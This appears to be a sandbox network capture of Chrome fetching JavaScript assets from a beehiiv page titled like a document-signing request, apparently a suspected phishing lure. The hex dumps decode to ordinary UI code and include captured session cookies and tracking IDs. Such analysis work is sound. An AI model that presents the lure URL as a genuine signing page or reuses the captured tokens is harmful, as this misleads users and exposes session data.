                                                                                                                                            2025-01-15 18:14:35 UTC468INData Raw: 2c 74 3d 7b 72 65 66 3a 6f 2c 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 28 69 26 32 29 3d 3d 3d 32 3f 21 30 3a 28 64 3d 72 5b 22 61 72 69 61 2d 68 69 64 64 65 6e 22 5d 29 21 3d 6e 75 6c 6c 3f 64 3a 76 6f 69 64 20 30 2c 73 74 79 6c 65 3a 7b 70 6f 73 69 74 69 6f 6e 3a 22 66 69 78 65 64 22 2c 74 6f 70 3a 31 2c 6c 65 66 74 3a 31 2c 77 69 64 74 68 3a 31 2c 68 65 69 67 68 74 3a 30 2c 70 61 64 64 69 6e 67 3a 30 2c 6d 61 72 67 69 6e 3a 2d 31 2c 6f 76 65 72 66 6c 6f 77 3a 22 68 69 64 64 65 6e 22 2c 63 6c 69 70 3a 22 72 65 63 74 28 30 2c 20 30 2c 20 30 2c 20 30 29 22 2c 77 68 69 74 65 53 70 61 63 65 3a 22 6e 6f 77 72 61 70 22 2c 62 6f 72 64 65 72 57 69 64 74 68 3a 22 30 22 2c 2e 2e 2e 28 69 26 34 29 3d 3d 3d 34 26 26 28 69 26 32 29 21 3d 3d 32 26 26 7b 64 69 73 70
                                                                                                                                            Data Ascii: ,t={ref:o,"aria-hidden":(i&2)===2?!0:(d=r["aria-hidden"])!=null?d:void 0,style:{position:"fixed",top:1,left:1,width:1,height:0,padding:0,margin:-1,overflow:"hidden",clip:"rect(0, 0, 0, 0)",whiteSpace:"nowrap",borderWidth:"0",...(i&4)===4&&(i&2)!==2&&{disp


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            61192.168.2.1649783104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:35 UTC840OUTGET /assets/Input-snMSpc3o.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:35 UTC912INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:35 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 1602
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"642-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4162
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8a91d2a43d7-EWR
                                                                                                                                            2025-01-15 18:14:35 UTC457INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 66 63 36 39 34 34 65 65 2d 35 36 38 31 2d 35 39 66 62 2d 38 38 61 61 2d 33 36 39 34 65 62 39 31 63 66 30 62 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="fc6944ee-5681-59fb-88aa-3694eb91cf0b")}catch(
                                                                                                                                            2025-01-15 18:14:35 UTC1145INData Raw: 72 3a 63 2c 6c 61 62 65 6c 3a 6c 2c 6c 61 62 65 6c 43 6f 6c 6f 72 3a 69 2c 66 6f 6e 74 43 6f 6c 6f 72 3a 6d 2c 68 65 6c 70 65 72 43 6f 6c 6f 72 3a 75 2c 64 69 73 61 62 6c 65 64 3a 70 2c 6f 6e 46 6f 63 75 73 3a 78 2c 6f 6e 42 6c 75 72 3a 67 2c 6f 6e 43 68 61 6e 67 65 3a 68 2c 6f 6e 4b 65 79 44 6f 77 6e 3a 62 2c 68 65 6c 70 65 72 54 65 78 74 3a 73 2c 65 72 72 6f 72 54 65 78 74 3a 74 2c 74 79 70 65 3a 79 3d 22 74 65 78 74 22 2c 72 65 71 75 69 72 65 64 3a 66 3d 21 30 2c 76 61 6c 75 65 3a 77 2c 2e 2e 2e 6a 7d 3d 6e 3b 72 65 74 75 72 6e 20 72 2e 6a 73 78 73 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 73 70 61 63 65 2d 79 2d 31 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 6c 26 26 72 2e 6a 73 78 28 22 6c 61 62 65 6c 22 2c 7b 68 74 6d 6c 46 6f 72 3a 6f 2c 63
                                                                                                                                            Data Ascii: r:c,label:l,labelColor:i,fontColor:m,helperColor:u,disabled:p,onFocus:x,onBlur:g,onChange:h,onKeyDown:b,helperText:s,errorText:t,type:y="text",required:f=!0,value:w,...j}=n;return r.jsxs("div",{className:"space-y-1",children:[l&&r.jsx("label",{htmlFor:o,c


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            62192.168.2.1649784104.244.42.1364436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:35 UTC620OUTGET /settings?session_id=5014ff864e2c4e055ad43236486b600cbc96bac6 HTTP/1.1
                                                                                                                                            Host: syndication.twitter.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Origin: https://platform.twitter.com
                                                                                                                                            Sec-Fetch-Site: same-site
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Referer: https://platform.twitter.com/
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            2025-01-15 18:14:35 UTC567INHTTP/1.1 200 OK
                                                                                                                                            date: Wed, 15 Jan 2025 18:14:35 GMT
                                                                                                                                            perf: 7402827104
                                                                                                                                            vary: Origin
                                                                                                                                            server: tsa_b
                                                                                                                                            content-type: application/json; charset=utf-8
                                                                                                                                            cache-control: must-revalidate, max-age=600
                                                                                                                                            last-modified: Wed, 15 Jan 2025 18:14:35 GMT
                                                                                                                                            content-length: 870
                                                                                                                                            x-transaction-id: a5cb023cffc3324d
                                                                                                                                            strict-transport-security: max-age=631138519
                                                                                                                                            access-control-allow-origin: https://platform.twitter.com
                                                                                                                                            access-control-allow-credentials: true
                                                                                                                                            x-response-time: 5
                                                                                                                                            x-connection-hash: 5a5b91be25404b8ad3c199c8dbb81bfd483fa6e8ce188c5bd2dc9703602dddb8
                                                                                                                                            connection: close
                                                                                                                                            2025-01-15 18:14:35 UTC870INData Raw: 7b 22 73 68 6f 75 6c 64 5f 6f 62 74 61 69 6e 5f 63 6f 6f 6b 69 65 5f 63 6f 6e 73 65 6e 74 22 3a 66 61 6c 73 65 2c 22 66 65 61 74 75 72 65 73 22 3a 7b 22 74 66 77 5f 74 69 6d 65 6c 69 6e 65 5f 6c 69 73 74 22 3a 7b 22 62 75 63 6b 65 74 22 3a 5b 5d 2c 22 76 65 72 73 69 6f 6e 22 3a 6e 75 6c 6c 7d 2c 22 74 66 77 5f 66 6f 6c 6c 6f 77 65 72 5f 63 6f 75 6e 74 5f 73 75 6e 73 65 74 22 3a 7b 22 62 75 63 6b 65 74 22 3a 74 72 75 65 2c 22 76 65 72 73 69 6f 6e 22 3a 6e 75 6c 6c 7d 2c 22 74 66 77 5f 74 77 65 65 74 5f 65 64 69 74 5f 62 61 63 6b 65 6e 64 22 3a 7b 22 62 75 63 6b 65 74 22 3a 22 6f 6e 22 2c 22 76 65 72 73 69 6f 6e 22 3a 6e 75 6c 6c 7d 2c 22 74 66 77 5f 72 65 66 73 72 63 5f 73 65 73 73 69 6f 6e 22 3a 7b 22 62 75 63 6b 65 74 22 3a 22 6f 6e 22 2c 22 76 65 72 73
                                                                                                                                            Data Ascii: {"should_obtain_cookie_consent":false,"features":{"tfw_timeline_list":{"bucket":[],"version":null},"tfw_follower_count_sunset":{"bucket":true,"version":null},"tfw_tweet_edit_backend":{"bucket":"on","version":null},"tfw_refsrc_session":{"bucket":"on","vers


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            63192.168.2.1649787104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:35 UTC856OUTGET /assets/RedirectToHiddenInput-mUb4yii7.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:35 UTC911INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:35 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 644
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"284-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4162
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8a9cedc7c69-EWR
                                                                                                                                            2025-01-15 18:14:35 UTC458INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 39 36 61 66 36 61 32 31 2d 64 30 62 35 2d 35 65 62 33 2d 61 61 64 61 2d 36 36 33 30 64 64 35 33 33 34 64 31 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="96af6a21-d0b5-5eb3-aada-6630dd5334d1")}catch(
                                                                                                                                            2025-01-15 18:14:35 UTC186INData Raw: 2e 6a 73 78 28 22 69 6e 70 75 74 22 2c 7b 74 79 70 65 3a 22 68 69 64 64 65 6e 22 2c 6e 61 6d 65 3a 22 72 65 64 69 72 65 63 74 5f 74 6f 22 2c 76 61 6c 75 65 3a 74 7c 7c 6f 7d 29 7d 3b 65 78 70 6f 72 74 7b 63 20 61 73 20 52 7d 3b 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 52 65 64 69 72 65 63 74 54 6f 48 69 64 64 65 6e 49 6e 70 75 74 2d 6d 55 62 34 79 69 69 37 2e 6a 73 2e 6d 61 70 0a 0a 2f 2f 23 20 64 65 62 75 67 49 64 3d 39 36 61 66 36 61 32 31 2d 64 30 62 35 2d 35 65 62 33 2d 61 61 64 61 2d 36 36 33 30 64 64 35 33 33 34 64 31 0a
                                                                                                                                            Data Ascii: .jsx("input",{type:"hidden",name:"redirect_to",value:t||o})};export{c as R};//# sourceMappingURL=RedirectToHiddenInput-mUb4yii7.js.map//# debugId=96af6a21-d0b5-5eb3-aada-6630dd5334d1


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            64192.168.2.1649788104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:35 UTC556OUTGET /assets/YoutubeIcon-DSouMQiN.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:35 UTC905INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:35 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 3850
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960860&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=FTFAbhRSm%2BLvyAx2y4n1YtRtinTGussYyR%2B2UCmOtto%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960860&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=FTFAbhRSm%2BLvyAx2y4n1YtRtinTGussYyR%2B2UCmOtto%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"f0a-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8aa2c66558a-EWR
                                                                                                                                            2025-01-15 18:14:35 UTC464INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 35 31 66 66 39 65 34 33 2d 64 39 63 63 2d 35 30 38 64 2d 38 65 38 65 2d 63 36 34 62 39 64 64 61 32 62 64 32 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="51ff9e43-d9cc-508d-8e8e-c64b9dda2bd2")}catch(
                                                                                                                                            2025-01-15 18:14:35 UTC1369INData Raw: 2c 66 69 6c 6c 3a 63 2c 63 68 69 6c 64 72 65 6e 3a 73 2e 6a 73 78 28 22 70 61 74 68 22 2c 7b 64 3a 22 4d 32 34 20 31 32 2e 30 37 33 63 30 2d 36 2e 36 32 37 2d 35 2e 33 37 33 2d 31 32 2d 31 32 2d 31 32 73 2d 31 32 20 35 2e 33 37 33 2d 31 32 20 31 32 63 30 20 35 2e 39 39 20 34 2e 33 38 38 20 31 30 2e 39 35 34 20 31 30 2e 31 32 35 20 31 31 2e 38 35 34 76 2d 38 2e 33 38 35 48 37 2e 30 37 38 76 2d 33 2e 34 37 68 33 2e 30 34 37 56 39 2e 34 33 63 30 2d 33 2e 30 30 37 20 31 2e 37 39 32 2d 34 2e 36 36 39 20 34 2e 35 33 33 2d 34 2e 36 36 39 20 31 2e 33 31 32 20 30 20 32 2e 36 38 36 2e 32 33 35 20 32 2e 36 38 36 2e 32 33 35 76 32 2e 39 35 33 48 31 35 2e 38 33 63 2d 31 2e 34 39 31 20 30 2d 31 2e 39 35 36 2e 39 32 35 2d 31 2e 39 35 36 20 31 2e 38 37 34 76 32 2e 32 35
                                                                                                                                            Data Ascii: ,fill:c,children:s.jsx("path",{d:"M24 12.073c0-6.627-5.373-12-12-12s-12 5.373-12 12c0 5.99 4.388 10.954 10.125 11.854v-8.385H7.078v-3.47h3.047V9.43c0-3.007 1.792-4.669 4.533-4.669 1.312 0 2.686.235 2.686.235v2.953H15.83c-1.491 0-1.956.925-1.956 1.874v2.25
                                                                                                                                            2025-01-15 18:14:35 UTC1369INData Raw: 30 2e 31 36 32 63 2d 32 2e 32 30 39 20 30 2d 34 2d 31 2e 37 39 2d 34 2d 34 20 30 2d 32 2e 32 30 39 20 31 2e 37 39 31 2d 34 20 34 2d 34 73 34 20 31 2e 37 39 31 20 34 20 34 63 30 20 32 2e 32 31 2d 31 2e 37 39 31 20 34 2d 34 20 34 7a 6d 36 2e 34 30 36 2d 31 31 2e 38 34 35 63 2d 2e 37 39 36 20 30 2d 31 2e 34 34 31 2e 36 34 35 2d 31 2e 34 34 31 20 31 2e 34 34 73 2e 36 34 35 20 31 2e 34 34 20 31 2e 34 34 31 20 31 2e 34 34 63 2e 37 39 35 20 30 20 31 2e 34 33 39 2d 2e 36 34 35 20 31 2e 34 33 39 2d 31 2e 34 34 73 2d 2e 36 34 34 2d 31 2e 34 34 2d 31 2e 34 33 39 2d 31 2e 34 34 7a 22 7d 29 7d 29 2c 68 3d 28 7b 63 6c 61 73 73 4e 61 6d 65 3a 65 2c 66 69 6c 6c 3a 63 7d 29 3d 3e 73 2e 6a 73 78 28 22 73 76 67 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 74 28 65 29 2c 78 6d 6c
                                                                                                                                            Data Ascii: 0.162c-2.209 0-4-1.79-4-4 0-2.209 1.791-4 4-4s4 1.791 4 4c0 2.21-1.791 4-4 4zm6.406-11.845c-.796 0-1.441.645-1.441 1.44s.645 1.44 1.441 1.44c.795 0 1.439-.645 1.439-1.44s-.644-1.44-1.439-1.44z"})}),h=({className:e,fill:c})=>s.jsx("svg",{className:t(e),xml
                                                                                                                                            2025-01-15 18:14:35 UTC648INData Raw: 48 31 2e 36 38 6c 37 2e 37 33 2d 38 2e 38 33 35 4c 31 2e 32 35 34 20 32 2e 32 35 48 38 2e 30 38 6c 34 2e 37 31 33 20 36 2e 32 33 31 7a 6d 2d 31 2e 31 36 31 20 31 37 2e 35 32 68 31 2e 38 33 33 4c 37 2e 30 38 34 20 34 2e 31 32 36 48 35 2e 31 31 37 7a 22 7d 29 7d 29 7d 29 2c 6c 3d 28 7b 63 6c 61 73 73 4e 61 6d 65 3a 65 2c 66 69 6c 6c 3a 63 7d 29 3d 3e 73 2e 6a 73 78 28 22 73 76 67 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 74 28 65 29 2c 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 77 69 64 74 68 3a 22 32 34 22 2c 68 65 69 67 68 74 3a 22 32 34 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 32 34 20 32 34 22 2c 66 69 6c 6c 3a 63 2c 63 68 69 6c 64 72 65 6e 3a 73 2e 6a 73 78 28 22 70 61 74 68 22 2c 7b 64 3a
                                                                                                                                            Data Ascii: H1.68l7.73-8.835L1.254 2.25H8.08l4.713 6.231zm-1.161 17.52h1.833L7.084 4.126H5.117z"})})}),l=({className:e,fill:c})=>s.jsx("svg",{className:t(e),xmlns:"http://www.w3.org/2000/svg",width:"24",height:"24",viewBox:"0 0 24 24",fill:c,children:s.jsx("path",{d:


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            65192.168.2.1649790104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:35 UTC846OUTGET /assets/description-BklOXbF-.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:35 UTC912INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:35 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 1401
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"579-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4162
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8aa2a18f3bb-EWR
